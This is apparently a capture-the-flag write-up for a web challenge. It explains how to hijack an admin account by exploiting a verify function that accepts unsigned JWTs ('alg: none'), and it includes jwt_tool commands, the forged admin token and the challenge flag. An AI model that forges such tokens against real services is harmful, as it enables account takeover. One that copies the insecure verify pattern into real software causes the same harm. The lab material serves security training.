# Temp Note

## CHALLENGE INFO

We have built this secure disposable note web app but we want to make sure no account hijacking is possible. We have saved a temporary note from the "admin" user and want you to find a way to hijack the account.

## Challange download and instructions

[web_temp_note](web_temp_note.zip)

To run challange you need some linux with docker

- unzip file
- run ./build-docker.sh

## Solve

Hint in helpers / JWTHelpers.js

<details>
<summary>Click this to collapse/fold.</summary>

Hint: you can use **algorithm = none**

```javascript
verify(token) {
	return jwt.verify(token, SECRET, { algorithms: ['HS256', 'none'] });
}
```

```bash
# python jwt_tool.py -X a eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imd1ZXN0X2NiNWMxNzFlZDUiLCJpYXQiOjE2MzQ2NTI2MjJ9.8zcJofZGY3OX8rr2gv_I5C74eQNXx9n4CScdWQFfiPk

jwttool_3484d206c1e35d8291b95455b4e1882f - EXPLOIT: "alg":"none" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VybmFtZSI6Imd1ZXN0X2NiNWMxNzFlZDUiLCJpYXQiOjE2MzQ2NTI2MjJ9.
...
```

```bash
# python jwt_tool.py -T eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VybmFtZSI6Imd1ZXN0X2NiNWMxNzFlZDUiLCJpYXQiOjE2MzQ2NTI2MjJ9.

Token header values:
[1] alg = "none"
[2] typ = "JWT"
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 0

Token payload values:
[1] username = "guest_cb5c171ed5"
[2] iat = 1634652622    ==> TIMESTAMP = 2021-10-19 17:10:22 (UTC)
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[5] *UPDATE TIMESTAMPS*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 1

Current value of username is: guest_cb5c171ed5
Please enter new value and hit ENTER
> admin
[1] username = "admin"
[2] iat = 1634652622    ==> TIMESTAMP = 2021-10-19 17:10:22 (UTC)
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[5] *UPDATE TIMESTAMPS*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 0
Signature unchanged - no signing method specified (-S or -X)
jwttool_850833dc2386e3f9c38df33cd39e2144 - Tampered token:
[+] eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNjM0NjUyNjIyfQ.
```

Use new JWT to login / dashboard.

</details>

## Flag

HTB{Th3_cur10us_add17i0n_Non3}
